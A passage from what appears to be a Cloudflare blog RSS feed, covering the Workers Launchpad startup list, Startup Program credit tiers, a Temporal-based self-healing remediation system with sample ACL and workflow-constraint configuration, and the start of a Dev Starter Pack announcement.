href="http://www.heartspace.ai"><b>Heartspace</b></a></p></td><td><p>Deliver quality PR on demand: pay for placements, not retainers</p></td></tr><tr><td><p><a href="http://www.lamatic.ai"><b>Lamatic</b></a></p></td><td><p>Managed AI middleware and IDE to embed AI features quickly and reliably</p></td></tr><tr><td><p><a href="http://lu.ma"><b>Lu.ma</b></a></p></td><td><p>Application that makes it easy to host great events</p></td></tr><tr><td><p><a href="http://www.manticore.ai"><b>Manticore</b></a></p></td><td><p>AI-driven penetration testing: identify, remediate, and retest on-demand</p></td></tr><tr><td><p><a href="http://mc2.fi"><b>MC</b></a><a href="https://mc2finance.com/about-mc-">²</a><a href="http://mc2.fi"><b> Finance</b></a></p></td><td><p>Crowdsource DeFi strategies and list them as ETFs</p></td></tr><tr><td><p><a href="http://muppet.dev"><b>Muppet</b></a></p></td><td><p>Platform for building and managing MCPs at scale</p></td></tr><tr><td><p><a href="http://www.navatech.ai"><b>Navatech</b></a></p></td><td><p>Remove barriers to language, access, and modality for frontline workers</p></td></tr><tr><td><p><a href="https://era.new/"><b>New Era</b></a></p></td><td><p>Craft beautiful emails using natural language</p></td></tr><tr><td><p><a href="http://www.newharbor.co"><b>New Harbor</b></a></p></td><td><p>Simple, friendly, all-in-one cybersecurity for organizations</p></td></tr><tr><td><p><a href="https://nexartis.com/"><b>Nexartis</b></a></p></td><td><p>Enable new paths for rights management, protect intellectual property, and properly monetize individual contributions</p></td></tr><tr><td><p><a href="http://www.nordcraft.com"><b>Nordcraft</b></a></p></td><td><p>Web development engine that lets product teams build beautiful interactive web applications</p></td></tr><tr><td><p><a href="http://www.periculum.io"><b>Periculum</b></a></p></td><td><p>AI provider offering data analytics software solutions to organizations in underserved markets</p></td></tr><tr><td><p><a href="http://pressbox.studio/"><b>Pressbox</b></a></p></td><td><p>AI-powered multi-modal content personalization for sports and media organizations</p></td></tr><tr><td><p><a href="http://www.prompteus.com"><b>Prompteus</b></a></p></td><td><p>Guardrails, logging, and cost reduction for AI integrations</p></td></tr><tr><td><p><a href="https://remixlabs.com/"><b>Remix Labs</b></a></p></td><td><p>Enable next-gen digital engagement with agentic app experiences</p></td></tr><tr><td><p><a href="http://www.skyward.ai"><b>Skyward</b></a></p></td><td><p>The AI-native workspace for compliance teams</p></td></tr><tr><td><p><a href="http://www.usesonora.com"><b>Sonora</b></a></p></td><td><p>AI-native customer intelligence platform that synthesizes customer feedback and delivers actionable insights across all communication channels</p></td></tr><tr><td><p><a href="https://ssojet.com/"><b>SSOJet</b></a></p></td><td><p>Intelligent enterprise SSO that just works</p></td></tr><tr><td><p><a href="http://syrenn.co"><b>Syrenn</b></a></p></td><td><p>AI outbound sales-coaching platform</p></td></tr><tr><td><p><a href="http://testdriver.ai"><b>Testdriver</b></a></p></td><td><p>Increase test coverage with Computer-Use agents</p></td></tr><tr><td><p></p></td><td><p></p></td></tr><tr><td><p><a href="http://www.toolhouse.ai"><b>Toolhouse</b></a></p></td><td><p>Platform that enables any developer to build AI agents and workflows with a great developer experience</p></td></tr><tr><td><p><a href="http://www.unravo.org"><b>Unravo</b></a></p></td><td><p>Agentic AI-powered, end-to-end business research platform</p></td></tr><tr><td><p><a href="http://wittify.ai"><b>Wittify.ai</b></a></p></td><td><p>Advanced Arabic conversational AI for customer engagement activities</p></td></tr><tr><td><p><a href="http://actualize.zerosumdefense.io"><b>Zero Sum Defense</b></a></p></td><td><p>Digital freedom through tailored security and privacy</p></td></tr></table>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/40boL9159chHNCBcqOccse/96aae4b197042500da8a78b172db0cf0/5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <guid isPermaLink="false">44H31LjCVMieZ4K7wqlLaj</guid>
            <dc:creator>Christopher Rotas</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup Program update: empowering every stage of the startup journey]]></title>
            <link>https://blog.cloudflare.com/expanding-cloudflares-startup-program/</link>
            <pubDate>Fri, 11 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare’s Startup Program offers up to $250,000 in credits for companies building on our Developer Platform across 4 tiers: $5,000, $25,000, $100,000, and $250,000. ]]></description>
            <content:encoded><![CDATA[ <p>During Cloudflare’s Birthday Week in September 2024, we <a href="https://blog.cloudflare.com/startup-program-250k-credits/"><u>introduced</u></a> a revamped Startup Program designed to make it easier for startups to adopt Cloudflare through a new credits system. This update focused on better aligning the program with how startups and developers actually consume Cloudflare, by providing them with clearer insight into their projected usage, especially as they approach graduation from the program.</p><p>Today, we’re excited to announce an expansion to that program: new credit tiers that better match startups at every stage of their journey. But before we dive into what’s new, let’s take a quick look at what the Startup Program is and why it exists.</p>
    <div>
      <h2>A refresher: what is the Startup Program?</h2>
      <a href="#a-refresher-what-is-the-startup-program">
        
      </a>
    </div>
    <p>Cloudflare for Startups provides credits to help early-stage companies build the next big idea on our platform. Startups accepted into the program receive credits valid for one year or until they’re fully used, whichever comes first.</p><p>Beyond credits, the program includes access to up to three domains with enterprise-level services, giving startups the same advanced tools we provide to large companies to protect and accelerate their most critical applications.</p><p>We know that building a startup is expensive, and Cloudflare is uniquely positioned to support the full-stack needs of modern applications. Our goal is simple: ensure that you have access to the best of Cloudflare’s global network, without the barriers of cost or availability.</p><p>Since launching the revamped credits system in September, we’ve learned a lot from the startups in our program, including what they’re building, what they need, and where they need more flexibility. One of the most common requests was more credit tier options.</p><p>That’s why we’re introducing new tiers that provide even more options to startups as they scale.</p>
    <div>
      <h2>Introducing additional credit tiers</h2>
      <a href="#introducing-additional-credit-tiers">
        
      </a>
    </div>
    <p>The Cloudflare for Startups Program now offers four credit tiers: </p><table><tr><td><p><b>Credit Amount</b></p></td><td><p><b>$5,000</b></p></td><td><p><b>$25,000</b></p></td><td><p><b>$100,000</b></p></td><td><p><b>$250,000</b></p></td></tr><tr><td><p><b>Stage</b></p></td><td><p>Bootstrapped, stealth startups</p></td><td><p>Up-and-coming startups</p></td><td><p>Seed-funded startups</p></td><td><p>Tier 1 startups</p></td></tr><tr><td><p><b>Description</b></p></td><td><p>For startups who are just getting started. This tier is great for building, testing, and iterating your product.</p></td><td><p>For startups with early adopters and proving product market fit.</p></td><td><p>For startups that have raised capital, and are experiencing high growth.</p></td><td><p>For scaling startups that belong to our Tier 1 VC and accelerator network, are building a mission-critical AI application, or are participating in our <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Workers Launchpad</u></a> Program.</p></td></tr><tr><td><p><b>Criteria</b></p></td><td><p>Building a software-based product or service</p><p>Founded in the last 5 years</p><p>Valid and matching email address</p></td><td><p><b>$5,000 criteria plus:</b></p><p>
</p><p>Active LinkedIn</p><p>Funded up to $1M</p></td><td><p><b>$25,000 criteria plus:</b></p><p>
</p><p>Funded between $1M and $5M</p><p>Belong to any of our 250+ approved VC or Accelerator partners</p></td><td><p><b>$100,000 criteria plus:</b></p><p>
</p><p>High growth / AI companies, <b>OR</b></p><p>Tier 1 VC &amp; Accelerators</p></td></tr></table><p>These tiers are designed to offer simplicity and clarity by aligning with where you are in your growth journey. (You can check out eligibility criteria and apply to the Startup Program <a href="https://www.cloudflare.com/forstartups/?utm_medium=referral&amp;utm_source=partner&amp;utm_campaign=2024-q4-dev-gbl-developers-ge-ge-general-pay_devweek25"><u>here</u></a>). These tiers are still subject to the same Cloudflare for Startups Terms of Service. Credits are valid for up to one year or when all credits are consumed (whichever comes first).</p>
    <div>
      <h2>Why are we adding additional credit tiers?</h2>
      <a href="#why-are-we-adding-additional-credit-tiers">
        
      </a>
    </div>
    <p>We understand that each startup may have different needs depending on where they’re at in their journey. Some are just getting off the ground, others are scaling rapidly, and each has unique infrastructure needs. With this expansion, we’re reaffirming Cloudflare’s commitment to startups of all sizes, making it easier for you to access the right level of support and resources, exactly when you need them.</p><p>Whether you're launching your MVP or preparing for your next funding round, Cloudflare is here to help you grow.</p>
    <div>
      <h2>What can I use the credit tiers for?</h2>
      <a href="#what-can-i-use-the-credit-tiers-for">
        
      </a>
    </div>
    <p>The vast majority of Cloudflare products (including all products found on the pay-as-you-go plans) can be used on the Startup Program. Beyond going to the <a href="http://www.cloudflare.com/forstartups"><u>website</u></a> to see what products are included, below are a few examples of what you can use your credits for:  </p><p><b>Build AI applications</b></p><p>Store your training data in <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a>, build AI-powered agents (via <a href="https://developers.cloudflare.com/agents/api-reference/"><u>Agents SDK</u></a>) that autonomously perform tasks with <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a> and <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Workers</u></a>, or use one of over <a href="https://developers.cloudflare.com/workers-ai/models/"><u>50 models</u></a> to run inference tasks on Cloudflare’s global network.  </p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/agents-starter">
<img src="https://deploy.workers.cloudflare.com/button" /></a>
<p></p><p><b>Create immersive realtime experiences</b></p><p>Deliver live audio and video via our <a href="https://www.cloudflare.com/developer-platform/products/cloudflare-calls/"><u>Realtime Kit</u></a>, enhance the experience with an AI-powered chatbot running on <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a> to transcribe the call, broadcast to large audiences with <a href="https://www.cloudflare.com/developer-platform/products/cloudflare-stream/"><u>Stream</u></a>.  </p><p><b>Build durable multi-step applications</b></p><p>Design and run long-lived, multi-step processes like onboarding flows, document processing, or order fulfillment. Use <a href="https://developers.cloudflare.com/workflows/"><u>Workflows</u></a> to coordinate logic across Workers, Durable Objects, <a href="https://developers.cloudflare.com/queues/"><u>Queues</u></a>, and AI tasks. Easily handle retries, timeouts, and state management without complex orchestration infrastructure.</p>
    <div>
      <h2>What are startups saying about Cloudflare?</h2>
      <a href="#what-are-startups-saying-about-cloudflare">
        
      </a>
    </div>
    
    <div>
      <h3>Webstudio’s no-code platform is powered by Cloudflare’s Developer Platform</h3>
      <a href="#webstudios-no-code-platform-is-powered-by-cloudflares-developer-platform">
        
      </a>
    </div>
    <blockquote><p>"From a modern design tool, you'd expect real-time collaborative features and would like to have resources as close to users as possible. Since betting on the Developer Platform architecture, Cloudflare has done more for us than any other vendor out there!" - Oleg Isonen (Founder &amp; CEO)</p></blockquote>
    <div>
      <h3>GrackerAI’s cybersecurity research engine runs on Cloudflare’s AI and serverless architecture</h3>
      <a href="#grackerais-cybersecurity-research-engine-runs-on-cloudflares-ai-and-serverless-architecture">
        
      </a>
    </div>
    <blockquote><p>“Cloudflare’s fusion of edge computing and AI empowers developers to deploy and utilize AI models with unprecedented efficiency and scale, marking a significant leap forward in how we build and interact with intelligent systems.” - Deepak Gupta (Co-founder &amp; CEO)</p></blockquote>
    <div>
      <h3>Render Better powers faster ecommerce experiences with Cloudflare Workers</h3>
      <a href="#render-better-powers-faster-ecommerce-experiences-with-cloudflare-workers">
        
      </a>
    </div>
    <blockquote><p>"Each month Render Better optimizes billions of monthly requests for ecommerce visitors, delivering faster loading sites that make top brands millions more in revenue. We're able to scale up with Cloudflare's serverless workers, handling every request at the network edge within milliseconds, thanks to the rock solid, DX-friendly scope of the Developer Platform." -  James Koshigoe (Co-founder &amp; CEO)</p></blockquote>
    <div>
      <h2>What will you build on Cloudflare? </h2>
      <a href="#what-will-you-build-on-cloudflare">
        
      </a>
    </div>
    <p>We can’t wait to see what you will build on Cloudflare. <a href="https://www.cloudflare.com/forstartups/"><u>Apply here</u></a> to take advantage of the Cloudflare for Startups Program.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4kpJ5k3dobY8IscTGoxi7u/2bf888052df84772ece9d9858591329d/image1.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Developer Week]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Startup Enterprise Plan]]></category>
            <guid isPermaLink="false">5ojXWmlREPcudSVM0TNmZk</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Melissa Kargiannakis</dc:creator>
        </item>
        <item>
            <title><![CDATA[Improving platform resilience at Cloudflare through automation]]></title>
            <link>https://blog.cloudflare.com/improving-platform-resilience-at-cloudflare/</link>
            <pubDate>Wed, 09 Oct 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ We realized that we need a way to automatically heal our platform from an operations perspective, and designed and built a workflow orchestration platform to provide these self-healing capabilities   ]]></description>
            <content:encoded><![CDATA[ <p>Failure is an expected state in production systems, and no predictable failure of either software or hardware components should result in a negative experience for users. The exact failure mode may vary, but certain remediation steps must be taken after detection. A common example is when an error occurs on a server, rendering it unfit for production workloads, and requiring action to recover.</p><p>When operating at Cloudflare’s scale, it is important to ensure that our platform is able to recover from faults seamlessly. It can be tempting to rely on the expertise of world-class engineers to remediate these faults, but this would be manual, repetitive, unlikely to produce enduring value, and not scaling. In one word: toil; not a viable solution at our scale and rate of growth.</p><p>In this post we discuss how we built the foundations to enable a more scalable future, and what problems it has immediately allowed us to solve.</p>
    <div>
      <h2>Growing pains</h2>
      <a href="#growing-pains">
        
      </a>
    </div>
    <p>The Cloudflare <a href="https://en.wikipedia.org/wiki/Site_reliability_engineering"><u>Site Reliability Engineering (SRE)</u></a> team builds and manages the platform that helps product teams deliver our extensive suite of offerings to customers. One important component of this platform is the collection of servers that power critical products such as Durable Objects, Workers, and DDoS mitigation. We also build and maintain foundational software services that power our product offerings, such as configuration management, provisioning, and IP address allocation systems.</p><p>As part of tactical operations work, we are often required to respond to failures in any of these components to minimize impact to users. Impact can vary from lack of access to a specific product feature, to total unavailability. The level of response required is determined by the priority, which is usually a reflection of the severity of impact on users. Lower-priority failures are more common — a server may run too hot, or experience an unrecoverable hardware error. Higher-priority failures are rare and are typically resolved via a well-defined incident response process, requiring collaboration with multiple other teams.</p><p>The commonality of lower-priority failures makes it obvious when the response required, as defined in runbooks, is “toilsome”. To reduce this toil, we had previously implemented a plethora of solutions to automate runbook actions such as manually-invoked shell scripts, cron jobs, and ad-hoc software services. These had grown organically over time and provided solutions on a case-by-case basis, which led to duplication of work, tight coupling, and lack of context awareness across the solutions.</p><p>We also care about how long it takes to resolve any potential impact on users. A resolution process which involves the manual invocation of a script relies on human action, increasing the Mean-Time-To-Resolve (MTTR) and leaving room for human error. This risks increasing the amount of errors we serve to users and degrading trust.</p><p>These problems proved that we needed a way to automatically heal these platform components. This especially applies to our servers, for which failure can cause impact across multiple product offerings. While we have <a href="https://blog.cloudflare.com/unimog-cloudflares-edge-load-balancer"><u>mechanisms to automatically steer traffic away</u></a> from these degraded servers, in some rare cases the breakage is sudden enough to be visible.</p>
    <div>
      <h2>Solving the problem</h2>
      <a href="#solving-the-problem">
        
      </a>
    </div>
    <p>To provide a more reliable platform, we needed a new component that provides a common ground for remediation efforts. This would remove duplication of work, provide unified context-awareness and increase development speed, which ultimately saves hours of engineering time and effort.</p><p>A good solution would not allow only the SRE team to auto-remediate, it would empower the entire company. The key to adding self-healing capability was a generic interface for all teams to self-service and quickly remediate failures at various levels: machine, service, network, or dependencies.</p><p>A good way to think about auto-remediation is in terms of workflows. A workflow is a sequence of steps to get to a desired outcome. This is not dissimilar to a manual shell script which executes what a human would otherwise do via runbook instructions. Because of this logical fit with workflows and durable execution, we decided to adopt an open-source platform called <a href="https://github.com/temporalio/temporal"><u>Temporal</u></a>. </p><p>The concept of durable execution is useful to gracefully manage infrastructure failures such as network outages and transient failures in external service endpoints. This capability meant we only needed to build a way to schedule “workflow” tasks and have the code provide reliability guarantees by default, using Temporal. This allowed us to focus on building out the orchestration system to support the control and flow of workflow execution in our data centers. </p><p><a href="https://learn.temporal.io/getting_started/go/first_program_in_go/"><u>Temporal’s documentation</u></a> provides a good introduction to writing Temporal workflows.</p>
    <div>
      <h2>Building an Automatic Remediation System</h2>
      <a href="#building-an-automatic-remediation-system">
        
      </a>
    </div>
    <p>Below, we describe how our automatic remediation system works. It is essentially a way to schedule tasks across our global network with built-in reliability guarantees. With this system, teams can serve their customers more reliably. An unexpected failure mode can be recognized and immediately mitigated, while the root cause can be determined later via a more detailed analysis.</p>
    <div>
      <h3>Step one: we need a coordinator</h3>
      <a href="#step-one-we-need-a-coordinator">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/FOpkEE13QcgwHJ9vhcIZj/5b0c5328ee5326794329a4a07c5db065/Building_on_Temporal_process.png" />
          </figure><p>After our initial testing of Temporal, it was now possible to write workflows. But we needed a way to schedule workflow tasks from other internal services. The coordinator was built to serve this purpose, and became the primary mechanism for the authorisation and scheduling of workflows. </p><p>The most important roles of the coordinator are authorisation, workflow task routing, and safety constraints enforcement. Each consumer is authorized via <a href="https://www.cloudflare.com/learning/access-management/what-is-mutual-tls/"><u>mTLS authentication</u></a>, and the coordinator uses an ACL to determine whether to permit the execution of a workflow. An ACL configuration looks like the following example.</p>
            <pre><code>server_config {
    enable_tls = true
    [...]
    route_rule {
      name  = "global_get"
      method = "GET"
      route_patterns = ["/*"]
      uris = ["spiffe://example.com/worker-admin"]
    }
    route_rule {
      name = "global_post"
      method = "POST"
      route_patterns = ["/*"]
      uris = ["spiffe://example.com/worker-admin"]
      allow_public = true
    }
    route_rule {
      name = "public_access"
      method = "GET"
      route_patterns = ["/metrics"]
      uris = []
      allow_public = true
      skip_log_match = true
    }
}
</code></pre>
            <p>Each workflow specifies two key characteristics: where to run the tasks and the safety constraints, using an <a href="https://github.com/hashicorp/hcl"><u>HCL</u></a> configuration file. Example constraints could be whether to run on only a specific node type (such as a database), or if multiple parallel executions are allowed: if a task has been triggered too many times, that is a sign of a wider problem that might require human intervention. The coordinator uses the Temporal <a href="https://docs.temporal.io/visibility"><u>Visibility API</u></a> to determine the current state of the executions in the Temporal cluster.</p><p>An example of a configuration file is shown below:</p>
            <pre><code>task_queue_target = "&lt;target&gt;"

# The following entries will ensure that
# 1. This workflow is not run at the same time in a 15m window.
# 2. This workflow will not run more than once an hour.
# 3. This workflow will not run more than 3 times in one day.
#
constraint {
    kind = "concurency"
    value = "1"
    period = "15m"
}

constraint {
    kind = "maxExecution"
    value = "1"
    period = "1h"
}

constraint {
    kind = "maxExecution"
    value = "3"
    period = "24h"
    is_global = true
}
</code></pre>
            
    <div>
      <h3>Step two: Task Routing is amazing</h3>
      <a href="#step-two-task-routing-is-amazing">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4wOIwKfkKzp7k46Z6tPuhW/f35667a65872cf7a90fc9c03f38a48d5/Task_Routing_is_amazing_process.png" />
          </figure><p>An unforeseen benefit of using a central Temporal cluster was the discovery of Task Routing. This feature allows us to schedule a Workflow/Activity on any server that has a running Temporal Worker, and further segment by the type of server, its location, etc. For this reason, we have three primary task queues — the general queue in which tasks can be executed by any worker in the datacenter, the node type queue in which tasks can only be executed by a specific node type in the datacenter, and the individual node queue where we target a specific node for task execution.</p><p>We rely on this heavily to ensure the speed and efficiency of automated remediation. Certain tasks can be run in datacenters with known low latency to an external resource, or a node type with better performance than others (due to differences in the underlying hardware). This reduces the amount of failure and latency we see overall in task executions. Sometimes we are also constrained by certain types of tasks that can only run on a certain node type, such as a database.</p><p>Task Routing also means that we can configure certain task queues to have a higher priority for execution, although this is not a feature we have needed so far. A drawback of task routing is that every Workflow/Activity needs to be registered to the target task queue, which is a common gotcha. Thankfully, it is possible to catch this failure condition with proper testing.</p>
    <div>
      <h3>Step three: when/how to self-heal?</h3>
      <a href="#step-three-when-how-to-self-heal">
        
      </a>
    </div>
    <p>None of this would be relevant if we didn’t put it to good use. A primary design goal for the platform was to ensure we had easy, quick ways to trigger workflows on the most important failure conditions. The next step was to determine what the best sources to trigger the actions were. The answer to this was simple: we could trigger workflows from anywhere as long as they are properly authorized and detect the failure conditions accurately.</p><p>Example triggers are an alerting system, a log tailer, a health check daemon, or an authorized engineer via a chatbot. Such flexibility allows a high level of reuse, and permits to invest more in workflow quality and reliability.</p><p>As part of the solution, we built a daemon that is able to poll a signal source for any unwanted condition and trigger a configured workflow. We have initially found <a href="https://blog.cloudflare.com/how-cloudflare-runs-prometheus-at-scale"><u>Prometheus</u></a> useful as a source because it contains both service-level and hardware/system-level metrics. We are also exploring more event-based trigger mechanisms, which could eliminate the need to use precious system resources to poll for metrics.</p><p>We already had internal services that are able to detect widespread failure conditions for our customers, but were only able to page a human. With the adoption of auto-remediation, these systems are now able to react automatically. This ability to create an automatic feedback loop with our customers is the cornerstone of these self-healing capabilities, and we continue to work on stronger signals, faster reaction times, and better prevention of future occurrences.</p><p>The most exciting part, however, is the future possibility. Every customer cares about any negative impact from Cloudflare. With this platform we can onboard several services (especially those that are foundational for the critical path) and ensure we react quickly to any failure conditions, even before there is any visible impact.</p>
    <div>
      <h3>Step four: packaging and deployment</h3>
      <a href="#step-four-packaging-and-deployment">
        
      </a>
    </div>
    <p>The whole system is written in <a href="https://go.dev/"><u>golang</u></a>, and a single binary can implement each role. We distribute it as an apt package or a container for maximum ease of deployment.</p><p>We deploy a Temporal-based worker to every server we intend to run tasks on, and a daemon in datacenters where we intend to automatically trigger workflows based on the local conditions. The coordinator is more nuanced since we rely on task routing and can trigger from a central coordinator, but we have also found value in running coordinators locally in the datacenters. This is especially useful in datacenters with less capacity or degraded performance, removing the need for a round-trip to schedule the workflows.</p>
    <div>
      <h3>Step five: test, test, test</h3>
      <a href="#step-five-test-test-test">
        
      </a>
    </div>
    <p>Temporal provides native mechanisms to test an entire workflow, via a <a href="https://docs.temporal.io/develop/go/testing-suite"><u>comprehensive test suite</u></a> that supports end-to-end, integration, and unit testing, which we used extensively to prevent regressions while developing. We also ensured proper test coverage for all the critical platform components, especially the coordinator.</p><p>Despite the ease of written tests, we quickly discovered that they were not enough. After writing workflows, engineers need an environment as close as possible to the target conditions. This is why we configured our staging environments to support quick and efficient testing. These environments receive the latest changes and point to a different (staging) Temporal cluster, which enables experimentation and easy validation of changes.</p><p>After a workflow is validated in the staging environment, we can then do a full release to production. It seems obvious, but catching simple configuration errors before releasing has saved us many hours in development/change-related-task time.</p>
    <div>
      <h2>Deploying to production</h2>
      <a href="#deploying-to-production">
        
      </a>
    </div>
    <p>As you can guess from the title of this post, we put this in production to automatically react to server-specific errors and unrecoverable failures. To this end, we have a set of services that are able to detect single-server failure conditions based on analyzed traffic data. After deployment, we have successfully mitigated potential impact by taking any errant single sources of failure out of production.</p><p>We have also created a set of workflows to reduce internal toil and improve efficiency. These workflows can automatically test pull requests on target machines, wipe and reset servers after experiments are concluded, and take away manual processes that cost many hours in toil.</p><p>Building a system that is maintained by several SRE teams has allowed us to iterate faster, and rapidly tackle long-standing problems. We have set ambitious goals regarding toil elimination and are on course to achieve them, which will allow us to scale faster by eliminating the human bottleneck.</p>
    <div>
      <h2>Looking to the future</h2>
      <a href="#looking-to-the-future">
        
      </a>
    </div>
    <p>Our immediate plans are to leverage this system to provide a more reliable platform for our customers and drastically reduce operational toil, freeing up engineering resources to tackle larger-scale problems. We also intend to leverage more Temporal features such as <a href="https://docs.temporal.io/develop/go/versioning"><u>Workflow Versioning</u></a>, which will simplify the process of making changes to workflows by ensuring that triggered workflows run expected versions. </p><p> We are also interested in how others are solving problems using durable execution platforms such as Temporal, and general strategies to eliminate toil. If you would like to discuss this further, feel free to reach out on the <a href="https://community.cloudflare.com"><u>Cloudflare Community</u></a> and start a conversation!</p><p>If you’re interested in contributing to projects that help build a better Internet, <a href="https://www.cloudflare.com/en-gb/careers/jobs/?department=Engineering&amp;location=default"><u>our engineering teams are hiring</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Edge]]></category>
            <category><![CDATA[Engineering]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Go]]></category>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[Speed & Reliability]]></category>
            <guid isPermaLink="false">2i9tHkPAfy7GxYAioGM100</guid>
            <dc:creator>Opeyemi Onikute</dc:creator>
        </item>
        <item>
            <title><![CDATA[Empowering builders: introducing the Dev Alliance and Workers Launchpad Cohort #4]]></title>
            <link>https://blog.cloudflare.com/launchpad-cohort4-dev-starter-pack/</link>
            <pubDate>Fri, 27 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Empowering developers with the Dev Starter Pack and Workers Cohort #4: get free or discounted access to essential developer tools and meet the latest set of incredible startups building on Cloudflare. ]]></description>
            <content:encoded><![CDATA[ <p>Today we’re announcing the Dev Starter Pack, an alliance of innovative tools for developers to get started with discounts and free services. We’re also excited to share an update on our <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>Workers Launchpad Program</u></a>.</p><p>Creating from the ground up often means spending countless hours piecing together the right development stack, navigating different pricing models, and managing growing costs — all of which can take your focus away from what truly matters: building your product and growing your business.</p>
    <div>
      <h3>Introducing Dev Starter Pack: the tools you need to start building your startup</h3>
      <a href="#introducing-dev-starter-pack-the-tools-you-need-to-start-building-your-startup">
        
      </a>
    </div>
    <p>Hey! <a href="https://x.com/thedanigrant"><u>Dani Grant</u></a> here, one of the first PMs at Cloudflare and co-founder of <a href="https://jam.dev"><u>Jam.dev</u></a>. Ten years ago (during 2014’s Birthday Week), Cloudflare <a href="https://blog.cloudflare.com/introducing-universal-ssl"><u>launched Universal SSL</u></a>, making SSL free on the Internet for the first time, and in one night <a href="https://blog.cloudflare.com/introducing-universal-ssl"><u>doubling</u></a> the size of the encrypted web.</p><p>I was a college student back then, and I immediately became enraptured by Cloudflare’s mission: helping build a better Internet. As part of this mission, Cloudflare has developed powerful tools typically accessible only to Internet giants, oftentimes offering them for free to developers and individuals alike. Heck yeah! I joined Cloudflare in January 2015, and 5 years after that, co-founded a developer tool company called Jam, inspired by the impact that I saw building tools for developers could have while at Cloudflare.</p><p>It’s now 10 years later, and a lot has changed –– “software ate the world” and it’s now powering all aspects of our lives, from health to finances to how we work. It’s more important than ever to empower every developer with the best tools available, because the faster we build software, the sooner people’s experiences improve.</p><p>Today we’re thrilled to announce the Dev Starter Pack, an alliance of like-minded dev tool companies giving away their services for free, or heavily discounting them for developers who want to start companies and build the future.</p><p>Not only does this stack include all the tools you need to build a startup, it also includes all the tools you need to build AI-powered features. We believe that the next wave of startups will be AI-native, as AI becomes as ubiquitous as the electricity that powers the servers.</p><p>We haven’t even scratched the surface of what’s possible with AI, and we hope this launch gets developers closer to solving the challenges of building non-deterministic software.</p><p>If you’re a software engineer, and you want to build a project or a company and need an off the shelf stack of dev tools to get started, go to <a href="http://devstarterpack.io"><u>devstarterpack.io</u></a> to start using all of these tools.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4YVrWHCfk96YagkSw2uK5l/71053eb95a2d434c93ad1464a41bac6a/image1.png" />
            
            </figure><p>Each provider is offering developers a heavily discounted or even free plan to get started building. You can redeem these services by either using the special code “devstarterpack” or selecting “Dev Starter Pack” while applying to relevant programs.</p><p>We welcome more tools to join the alliance — this is just the beginning. If you are building a developer tool and would like to include your product in the Dev Starter Pack, let us know <a href="https://www.cloudflare.com/lp/workers-launchpad/"><u>here</u></a>, so we can include you. </p>
    <div>
      <h3>What will you build?</h3>
      <a href="#what-will-you-build">
        
      </a>
    </div>
    <p>We are very excited to see what you will build. Please share with us in <a href="https://discord.com/invite/cloudflaredev"><u>Cloudflare’s Discord</u></a> and <a href="https://community.cloudflare.com/c/developers/39"><u>community forum</u></a>, so we can support you however it makes sense.</p><p>Software developers are changing the world, and we believe in providing support to help you make an even greater impact. If you’re looking for additional funding or support, check out <a href="https://blog.cloudflare.com/tag/workers-launchpad"><u>Cloudflare’s Launchpad</u></a> for developers turned founders building startups.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Vk47oye4jwsFn5DxffQkw/07b78fdd06ef24c09f3b0afe8ed585b5/image3.png" />
          </figure>
    <div>
      <h3>Introducing Workers Launchpad Cohort #4</h3>
      <a href="#introducing-workers-launchpad-cohort-4">
        
      </a>
    </div>
    <p>Melissa and Chris from the <a href="http://www.cloudflare.com/forstartups"><u>Cloudflare for Startups</u></a> team here. Our team is blown away by what customers are demonstrating on the Developer Platform. Just a few weeks ago, our Workers Launchpad Cohort #3 wrapped up. On <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-3/pgx2jLal"><u>Demo Day</u></a>, customers demoed their applications built on Cloudflare, spanning AI, dev tools, IaaS, observability, SaaS, media, and beyond. We’re incredibly proud of Cohort #3 participants, and we look forward to their continued success with Cloudflare.</p><p>Following Demo Day of Workers Launchpad Cohort #3, we’ve been excited to receive a surge of new applications from startups around the world. These startups are pushing the boundaries of innovation, particularly in areas like observability, PaaS, AI, automation, e-commerce, and other industries. Many startups that applied this go-around demonstrated that they’ve built some great applications on Cloudflare, and today, we’re excited to announce the accepted participants for our upcoming Workers Launchpad Cohort #4.</p><p>Let’s take a look at what Cohort #4 participants are building in their own words:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3WpVBXMoY8W2yzMpwh5keq/90be94945d04b122ec4dd090414ea014/image4.png" />
            
